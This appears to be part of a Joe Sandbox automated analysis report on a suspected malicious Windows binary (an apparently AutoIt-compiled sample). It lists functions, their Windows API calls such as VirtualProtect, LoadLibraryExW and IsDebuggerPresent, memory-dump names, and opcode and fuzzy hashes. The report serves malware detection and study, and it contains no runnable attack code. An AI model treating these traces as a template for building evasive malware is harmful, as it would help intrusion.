Download Yara Rule

APIs

CreateFileW.KERNELBASE(?,40000000,00000001,00000000,00000003,00000080,00000000,?,?,00E69548,?,?,?,?,?,00000004), ref: 00E698BB
SetFileTime.KERNELBASE(00000000,?,00000000,?,?,00E69548,?,?,?,?,?,00000004,00000001,?,?,00000004), ref: 00E698D1
CloseHandle.KERNEL32(00000000,?,00E69548,?,?,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?), ref: 00E698D8

Memory Dump Source

Source File: 00000000.00000002.2354451881.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true

Associated: 00000000.00000002.2354428760.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354514572.0000000000E8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354514572.0000000000EB4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354576062.0000000000EBE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354603796.0000000000EC7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e00000_CvzLvta2bG.jbxd

Similarity

API ID: File$CloseCreateHandleTime
String ID:
API String ID: 3397143404-0
Opcode ID: 54cb1ef6ab6179dc1c144db6f41a79baa7e0e09936e52afaa9ff8f2222440ec9
Instruction ID: 60ea3d3ae715815977b3eb90ae76b010cf1336d7a5fffcfe4ee84fabd8397438
Opcode Fuzzy Hash: 54cb1ef6ab6179dc1c144db6f41a79baa7e0e09936e52afaa9ff8f2222440ec9
Instruction Fuzzy Hash: B9E08632181214BBD7212B95EC0DFDA7B19EB06765F104220FB58B90E1C7B115259798

Function 00E68D0D Relevance: 4.5, APIs: 3, Instructions: 22COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 00E68D1B

Part of subcall function 00E22D55: RtlFreeHeap.NTDLL(00000000,00000000,?,00E29A24), ref: 00E22D69
Part of subcall function 00E22D55: GetLastError.KERNEL32(00000000,?,00E29A24), ref: 00E22D7B

_free.LIBCMT ref: 00E68D2C
_free.LIBCMT ref: 00E68D3E

Memory Dump Source

Source File: 00000000.00000002.2354451881.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true

Associated: 00000000.00000002.2354428760.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354514572.0000000000E8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354514572.0000000000EB4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354576062.0000000000EBE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354603796.0000000000EC7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e00000_CvzLvta2bG.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: 625e2a9df38ff8793e00647abbe9ccf0d6414545c555b0c4696158d27d9f7751
Instruction ID: 542b0550c191539f8a61446e5a71269a78d3e3c8d36fb4fa1a4246417f162705
Opcode Fuzzy Hash: 625e2a9df38ff8793e00647abbe9ccf0d6414545c555b0c4696158d27d9f7751
Instruction Fuzzy Hash: 08E012B164161157CB24A578BA40A9313DC4F5C3967142A1DB60DF7186CE64F8528174

Function 00E0A9C3 Relevance: 4.0, APIs: 1, Strings: 1, Instructions: 534COMMON

Download Yara Rule

Strings

CALL, xrefs: 00E3FC01

Memory Dump Source

Source File: 00000000.00000002.2354451881.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true

Associated: 00000000.00000002.2354428760.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354514572.0000000000E8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354514572.0000000000EB4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354576062.0000000000EBE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354603796.0000000000EC7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e00000_CvzLvta2bG.jbxd

Similarity

API ID:
String ID: CALL
API String ID: 0-4196123274
Opcode ID: 37049bdd61fa5c06c30d8f8422b798a68547b3ebcdc55d8572b280a5caaf0a24
Instruction ID: 717fb4d913ca38f737c0ac8f35f7f1734d71b72226701fe50060c075555472a5
Opcode Fuzzy Hash: 37049bdd61fa5c06c30d8f8422b798a68547b3ebcdc55d8572b280a5caaf0a24
Instruction Fuzzy Hash: 0C224D70508305DFD724DF14C494A6AB7E1FF84304F19A96DE89AAB3A2D731ED85CB82

Function 00E047D0 Relevance: 3.1, APIs: 2, Instructions: 59COMMON

Download Yara Rule

APIs

IsThemeActive.UXTHEME ref: 00E04834

Part of subcall function 00E2336C: __lock.LIBCMT ref: 00E23372
Part of subcall function 00E2336C: DecodePointer.KERNEL32(00000001,?,00E04849,00E57C74), ref: 00E2337E
Part of subcall function 00E2336C: EncodePointer.KERNEL32(?,?,00E04849,00E57C74), ref: 00E23389

Part of subcall function 00E048FD: SystemParametersInfoW.USER32(00002000,00000000,?,00000000), ref: 00E04915
Part of subcall function 00E048FD: SystemParametersInfoW.USER32(00002001,00000000,00000000,00000002), ref: 00E0492A

Part of subcall function 00E03B3A: GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 00E03B68
Part of subcall function 00E03B3A: IsDebuggerPresent.KERNEL32 ref: 00E03B7A
Part of subcall function 00E03B3A: GetFullPathNameW.KERNEL32(00007FFF,?,?,00EC52F8,00EC52E0,?,?), ref: 00E03BEB
Part of subcall function 00E03B3A: SetCurrentDirectoryW.KERNEL32(?), ref: 00E03C6F

SystemParametersInfoW.USER32(00002001,00000000,00000000,00000002), ref: 00E04874

Memory Dump Source

Source File: 00000000.00000002.2354451881.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true

Associated: 00000000.00000002.2354428760.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354514572.0000000000E8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354514572.0000000000EB4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354576062.0000000000EBE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354603796.0000000000EC7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e00000_CvzLvta2bG.jbxd

Similarity

API ID: InfoParametersSystem$CurrentDirectoryPointer$ActiveDebuggerDecodeEncodeFullNamePathPresentTheme__lock
String ID:
API String ID: 1438897964-0
Opcode ID: 84b2b1101b2b204c81a13f172cef4278fdf8bf9f96d1cb439546b65fd87cfd54
Instruction ID: dfbb67a752d487f3ddb36be0d3f799224b9c3207b8674d1ba745a96602acc3d1
Opcode Fuzzy Hash: 84b2b1101b2b204c81a13f172cef4278fdf8bf9f96d1cb439546b65fd87cfd54
Instruction Fuzzy Hash: CD1181B19043019FC704DF2AE80590EFBE8FB94750F10892EF454A32B2DB719589CB91

Function 00E20DB6 Relevance: 3.0, APIs: 2, Instructions: 44COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 00E2571C: __FF_MSGBANNER.LIBCMT ref: 00E25733
Part of subcall function 00E2571C: __NMSG_WRITE.LIBCMT ref: 00E2573A
Part of subcall function 00E2571C: RtlAllocateHeap.NTDLL(013A0000,00000000,00000001,00000000,?,?,?,00E20DD3,?), ref: 00E2575F

std::exception::exception.LIBCMT ref: 00E20DEC
__CxxThrowException@8.LIBCMT ref: 00E20E01

Part of subcall function 00E2859B: RaiseException.KERNEL32(?,?,?,00EB9E78,00000000,?,?,?,?,00E20E06,?,00EB9E78,?,00000001), ref: 00E285F0

Memory Dump Source

Source File: 00000000.00000002.2354451881.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true

Associated: 00000000.00000002.2354428760.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354514572.0000000000E8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354514572.0000000000EB4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354576062.0000000000EBE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354603796.0000000000EC7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e00000_CvzLvta2bG.jbxd

Similarity

API ID: AllocateExceptionException@8HeapRaiseThrowstd::exception::exception
String ID:
API String ID: 3902256705-0
Opcode ID: f4b7d736c578de607e77144888cd99e2a1fecc2372a7a0759594bc081d3111bc
Instruction ID: 35e876072270b94904df2444322b02080c1760002821050f70920e1a85fa7bd8
Opcode Fuzzy Hash: f4b7d736c578de607e77144888cd99e2a1fecc2372a7a0759594bc081d3111bc
Instruction Fuzzy Hash: CAF0813550222967CF10BAA4FD129DEB7E8AF01315F10642AFA14B6182DF709A80D6D1

Function 00E255FD Relevance: 3.0, APIs: 2, Instructions: 42COMMONLIBRARYCODE

Download Yara Rule

APIs

_memset.LIBCMT ref: 00E2562C
__lock_file.LIBCMT ref: 00E2564D

Memory Dump Source

Source File: 00000000.00000002.2354451881.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true

Associated: 00000000.00000002.2354428760.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354514572.0000000000E8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354514572.0000000000EB4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354576062.0000000000EBE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354603796.0000000000EC7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e00000_CvzLvta2bG.jbxd

Similarity

API ID: __lock_file_memset
String ID:
API String ID: 26237723-0
Opcode ID: dae52d193101eecb0d7e06fa4fb9c1faead96f08fcab488f24760b101592c986
Instruction ID: da7e97354b0216a808fe000525bbe77315b259ee036267ecd35658f3c421c760
Opcode Fuzzy Hash: dae52d193101eecb0d7e06fa4fb9c1faead96f08fcab488f24760b101592c986
Instruction Fuzzy Hash: 2201A772801628EBCF22AF64BE064AE7BE1AF91361F546115F8243A191DF318A51DF91

Function 00E253A6 Relevance: 3.0, APIs: 2, Instructions: 33COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 00E28B28: __getptd_noexit.LIBCMT ref: 00E28B28

__lock_file.LIBCMT ref: 00E253EB

Part of subcall function 00E26C11: __lock.LIBCMT ref: 00E26C34

__fclose_nolock.LIBCMT ref: 00E253F6

Memory Dump Source

Source File: 00000000.00000002.2354451881.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true

Associated: 00000000.00000002.2354428760.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354514572.0000000000E8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354514572.0000000000EB4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354576062.0000000000EBE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354603796.0000000000EC7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e00000_CvzLvta2bG.jbxd

Similarity

API ID: __fclose_nolock__getptd_noexit__lock__lock_file
String ID:
API String ID: 2800547568-0
Opcode ID: 9cba22f98c5c2a8b3e5cee4194f7545e8bc016c7d3ed3c6cf93d04bfb1d8896e
Instruction ID: 1d3ac7d2e99e8a37d04e4920b839bcb9706f822383fa588ec1d270510a4b1fe7
Opcode Fuzzy Hash: 9cba22f98c5c2a8b3e5cee4194f7545e8bc016c7d3ed3c6cf93d04bfb1d8896e
Instruction Fuzzy Hash: EFF09632802A249ADB10BB65BE027AD66E06F41374F24B258E424BB1C5CFFC49415B51

Function 0157DEA0 Relevance: 1.7, APIs: 1, Instructions: 191COMMON

Download Yara Rule

APIs

Part of subcall function 0157D710: GetFileAttributesW.KERNELBASE(?), ref: 0157D71B

CreateDirectoryW.KERNELBASE(?,00000000), ref: 0157E068

Memory Dump Source

Source File: 00000000.00000002.2355105121.000000000157C000.00000040.00000020.00020000.00000000.sdmp, Offset: 0157C000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_157c000_CvzLvta2bG.jbxd

Similarity

API ID: AttributesCreateDirectoryFile
String ID:
API String ID: 3401506121-0
Opcode ID: bc75258150282fda798e2088522b3dc8301da9dcd7abce354279e9c615dade4e
Instruction ID: 8635bbc364660ce5991499db8d9d960353614ca75247f2040f499a074c93917d
Opcode Fuzzy Hash: bc75258150282fda798e2088522b3dc8301da9dcd7abce354279e9c615dade4e
Instruction Fuzzy Hash: 57719231A2024996EF14DFF0DC41BEE7336FF98700F005569A609FB290EB769A45C76A

Function 00E20C08 Relevance: 1.6, APIs: 1, Instructions: 94memoryCOMMON

Download Yara Rule

APIs

VirtualProtect.KERNELBASE ref: 00E20CB7

Memory Dump Source

Source File: 00000000.00000002.2354451881.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true

Associated: 00000000.00000002.2354428760.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354514572.0000000000E8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354514572.0000000000EB4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354576062.0000000000EBE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354603796.0000000000EC7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e00000_CvzLvta2bG.jbxd

Similarity

API ID: ProtectVirtual
String ID:
API String ID: 544645111-0
Opcode ID: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
Instruction ID: 73677cdd7ad84c02983c7ff88aed462ee8c583043274a97e7ba895fd345cf3ba
Opcode Fuzzy Hash: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
Instruction Fuzzy Hash: 703106B0A001159FC718DF08E486969F7A6FF49314B2497A5E80AEB392DB31EDC1DBC0

Function 00E3FCAC Relevance: 1.6, APIs: 1, Instructions: 88COMMON

Download Yara Rule

APIs

VariantClear.OLEAUT32 ref: 00E3FCB7

Memory Dump Source

Source File: 00000000.00000002.2354451881.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true

Associated: 00000000.00000002.2354428760.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354514572.0000000000E8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354514572.0000000000EB4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354576062.0000000000EBE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354603796.0000000000EC7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e00000_CvzLvta2bG.jbxd

Similarity

API ID: ClearVariant
String ID:
API String ID: 1473721057-0
Opcode ID: 55843a082786bab42fc029170c3d83250ea5957529617170f2816313d5694840
Instruction ID: 20778dccc8d37b17447316a3ee74fbbc438c4e8fabf5c8046827a8993adfed5d
Opcode Fuzzy Hash: 55843a082786bab42fc029170c3d83250ea5957529617170f2816313d5694840
Instruction Fuzzy Hash: 2D411A745043519FDB14DF14C488B1ABBE1BF45318F0998ACE999AB3A2C731EC85CF52

Function 00E04DDD Relevance: 1.6, APIs: 1, Instructions: 64libraryCOMMON

Download Yara Rule

APIs

Part of subcall function 00E04BB5: FreeLibrary.KERNEL32(00000000,?), ref: 00E04BEF

Part of subcall function 00E2525B: __wfsopen.LIBCMT ref: 00E25266

LoadLibraryExW.KERNEL32(?,00000000,00000002,?,00EC52F8,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?), ref: 00E04E0F

Part of subcall function 00E04B6A: FreeLibrary.KERNEL32(00000000), ref: 00E04BA4

Part of subcall function 00E04C70: _memmove.LIBCMT ref: 00E04CBA

Memory Dump Source

Source File: 00000000.00000002.2354451881.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true

Associated: 00000000.00000002.2354428760.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354514572.0000000000E8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354514572.0000000000EB4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354576062.0000000000EBE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354603796.0000000000EC7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e00000_CvzLvta2bG.jbxd

Similarity

API ID: Library$Free$Load__wfsopen_memmove
String ID:
API String ID: 1396898556-0
Opcode ID: 08d6b892e94521415c6e540abbbeb010e8affe4ca5b60be66ba51a1a13d2bdf3
Instruction ID: 4f2eff90e4d59fe1d69c40429d5a2b73e4ea16f5d5574971b99b15b884cc4d5c
Opcode Fuzzy Hash: 08d6b892e94521415c6e540abbbeb010e8affe4ca5b60be66ba51a1a13d2bdf3
Instruction Fuzzy Hash: C711E3B264020AABCF15BF70DE16FAD77E8EF84710F109829F641BB1C1EA719A419B50

Function 00E3FD85 Relevance: 1.6, APIs: 1, Instructions: 63COMMON

Download Yara Rule

APIs

VariantClear.OLEAUT32(?), ref: 00E3FD91

Memory Dump Source

Source File: 00000000.00000002.2354451881.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true

Associated: 00000000.00000002.2354428760.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354514572.0000000000E8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354514572.0000000000EB4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354576062.0000000000EBE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354603796.0000000000EC7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e00000_CvzLvta2bG.jbxd

Similarity

API ID: ClearVariant
String ID:
API String ID: 1473721057-0
Opcode ID: 824d6618d9fe91396339657ac1c7c93537e23a79c93a7e3d2b4e027d6a1718f8
Instruction ID: db1a059bdc170d668b9006c5e77906d26d605ade9c4148bbcf8a1a5408a49dfe
Opcode Fuzzy Hash: 824d6618d9fe91396339657ac1c7c93537e23a79c93a7e3d2b4e027d6a1718f8
Instruction Fuzzy Hash: 9F215A74508301DFDB14DF14C844A5ABBE0BF88318F09986CF98967762C731E844CB52

Function 00E2072A Relevance: 1.6, APIs: 1, Instructions: 59COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2354451881.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true

Associated: 00000000.00000002.2354428760.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354514572.0000000000E8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354514572.0000000000EB4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354576062.0000000000EBE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354603796.0000000000EC7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e00000_CvzLvta2bG.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 37342396076872141c0ed64c4bbaacc28cf94c13ebf548a514789fb389e3afd3
Instruction ID: fd7d36b28907032ecea3d0c9c58a0db04dd04b64f25a2e1ec517c3172eb9062b
Opcode Fuzzy Hash: 37342396076872141c0ed64c4bbaacc28cf94c13ebf548a514789fb389e3afd3
Instruction Fuzzy Hash: 65012832444125DFE7216A54BC82AFAB7EDEFC1321F20807BFC48E68A1D6709C85CAD1

Function 00E24863 Relevance: 1.5, APIs: 1, Instructions: 36COMMON

Download Yara Rule

APIs

__lock_file.LIBCMT ref: 00E248A6

Part of subcall function 00E28B28: __getptd_noexit.LIBCMT ref: 00E28B28

Memory Dump Source

Source File: 00000000.00000002.2354451881.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true

Associated: 00000000.00000002.2354428760.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354514572.0000000000E8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354514572.0000000000EB4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354576062.0000000000EBE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354603796.0000000000EC7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e00000_CvzLvta2bG.jbxd

Similarity

API ID: __getptd_noexit__lock_file
String ID:
API String ID: 2597487223-0
Opcode ID: 0e15f081f023f291e3061e58f81f02dc2d85f5db84d92e2e34fff44a233e536e
Instruction ID: c05d31dedbdf3222fb5f527579047154d2334e3a51d02309af579500bc7072c3
Opcode Fuzzy Hash: 0e15f081f023f291e3061e58f81f02dc2d85f5db84d92e2e34fff44a233e536e
Instruction Fuzzy Hash: 4EF022B1911228EBDF19AFB0AC063EE36E0BF01324F04A404F424BA2C2DBB88950DB41

Function 00E04E4A Relevance: 1.5, APIs: 1, Instructions: 28COMMON

Download Yara Rule

APIs

FreeLibrary.KERNEL32(?,?,00EC52F8,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?), ref: 00E04E7E

Memory Dump Source

Source File: 00000000.00000002.2354451881.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true

Associated: 00000000.00000002.2354428760.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354514572.0000000000E8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354514572.0000000000EB4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354576062.0000000000EBE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354603796.0000000000EC7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e00000_CvzLvta2bG.jbxd

Similarity

API ID: FreeLibrary
String ID:
API String ID: 3664257935-0
Opcode ID: 5c6f1bae75497d70681d192ac505f074b760d5b9bb07e50435a9c67a64ae2301
Instruction ID: 980f7235beef8a9cf4742d7b3c6186970bd1c6516b1b4a0939778594f8b02691
Opcode Fuzzy Hash: 5c6f1bae75497d70681d192ac505f074b760d5b9bb07e50435a9c67a64ae2301
Instruction Fuzzy Hash: 31F065F1501712CFCB349F64E594852B7F1BF14369320993EE2D7A6690C7319885DF40

Function 00E20791 Relevance: 1.5, APIs: 1, Instructions: 24COMMON

Download Yara Rule

APIs

GetLongPathNameW.KERNELBASE(?,?,00007FFF), ref: 00E207B0

Part of subcall function 00E07BCC: _memmove.LIBCMT ref: 00E07C06

Memory Dump Source

Source File: 00000000.00000002.2354451881.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true

Associated: 00000000.00000002.2354428760.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354514572.0000000000E8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354514572.0000000000EB4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354576062.0000000000EBE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354603796.0000000000EC7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e00000_CvzLvta2bG.jbxd

Similarity

API ID: LongNamePath_memmove
String ID:
API String ID: 2514874351-0
Opcode ID: 1b80624a344d429f7886f8289f24ce983c718795781da4ea96f077af40eeee06
Instruction ID: 1d57e37be0d26ae5da5a28b978564cb32bfc84548389c4a540ee7741be1218f0
Opcode Fuzzy Hash: 1b80624a344d429f7886f8289f24ce983c718795781da4ea96f077af40eeee06
Instruction Fuzzy Hash: 65E0CD369041285BC720D6599C05FEA77DDDFC87A0F0541F5FC0CE7254DD60AC8086D0

Function 00E68E9F Relevance: 1.5, APIs: 1, Instructions: 22COMMON

Download Yara Rule

APIs

__fread_nolock.LIBCMT ref: 00E68EC1

Memory Dump Source

Source File: 00000000.00000002.2354451881.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true

Associated: 00000000.00000002.2354428760.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354514572.0000000000E8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354514572.0000000000EB4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354576062.0000000000EBE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354603796.0000000000EC7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e00000_CvzLvta2bG.jbxd

Similarity

API ID: __fread_nolock
String ID:
API String ID: 2638373210-0
Opcode ID: 36e66934677415102e9643fee0822ecf6e22e0db5db5ed1a6e3653ba213ae753
Instruction ID: f4ecec236e56319ca0329951f8c0f8f89cfa631ca40d355a864d7a1a00aae69f
Opcode Fuzzy Hash: 36e66934677415102e9643fee0822ecf6e22e0db5db5ed1a6e3653ba213ae753
Instruction Fuzzy Hash: D2E092B1104B005BD7388A24EC10BA373E1AB05308F00191DF2AA93241EB63B8418759

Function 0157D710 Relevance: 1.5, APIs: 1, Instructions: 20COMMON

Download Yara Rule

APIs

GetFileAttributesW.KERNELBASE(?), ref: 0157D71B

Memory Dump Source

Source File: 00000000.00000002.2355105121.000000000157C000.00000040.00000020.00020000.00000000.sdmp, Offset: 0157C000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_157c000_CvzLvta2bG.jbxd

Similarity

API ID: AttributesFile
String ID:
API String ID: 3188754299-0
Opcode ID: 195c23eedc4a89e51baf60bc3cc3d10d01908f8b29aed20e491e172ce03d4d2a
Instruction ID: 89754e031d9a4f7d3dd6ca49fd30474cc57f0b54b7c675273ebb5563a02615f4
Opcode Fuzzy Hash: 195c23eedc4a89e51baf60bc3cc3d10d01908f8b29aed20e491e172ce03d4d2a
Instruction Fuzzy Hash: 83E08C30A05288EBDB20CAF8A90ABADB7B8EB09320F004A54E906CB280D5309A419714

Function 0157D6E0 Relevance: 1.5, APIs: 1, Instructions: 15COMMON

Download Yara Rule

APIs

GetFileAttributesW.KERNELBASE(?), ref: 0157D6EB

Memory Dump Source

Source File: 00000000.00000002.2355105121.000000000157C000.00000040.00000020.00020000.00000000.sdmp, Offset: 0157C000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_157c000_CvzLvta2bG.jbxd

Similarity

API ID: AttributesFile
String ID:
API String ID: 3188754299-0
Opcode ID: 63700976fb5b8646ca9f82f7877e0f33cef2a649cb81b4b88ad66ba6039b9afc
Instruction ID: 29fbd90310dc82157c1a2d33eb8d42ee6376fa6bc39b2531defcfbe86ce0f0a4
Opcode Fuzzy Hash: 63700976fb5b8646ca9f82f7877e0f33cef2a649cb81b4b88ad66ba6039b9afc
Instruction Fuzzy Hash: 53D05E7090520CABCB10CAE8A905A9EB7A8AB05321F004754E91987280D53199409650

Function 00E2525B Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

__wfsopen.LIBCMT ref: 00E25266

Memory Dump Source

Source File: 00000000.00000002.2354451881.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true

Associated: 00000000.00000002.2354428760.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354514572.0000000000E8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354514572.0000000000EB4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354576062.0000000000EBE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354603796.0000000000EC7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e00000_CvzLvta2bG.jbxd

Similarity

API ID: __wfsopen
String ID:
API String ID: 197181222-0
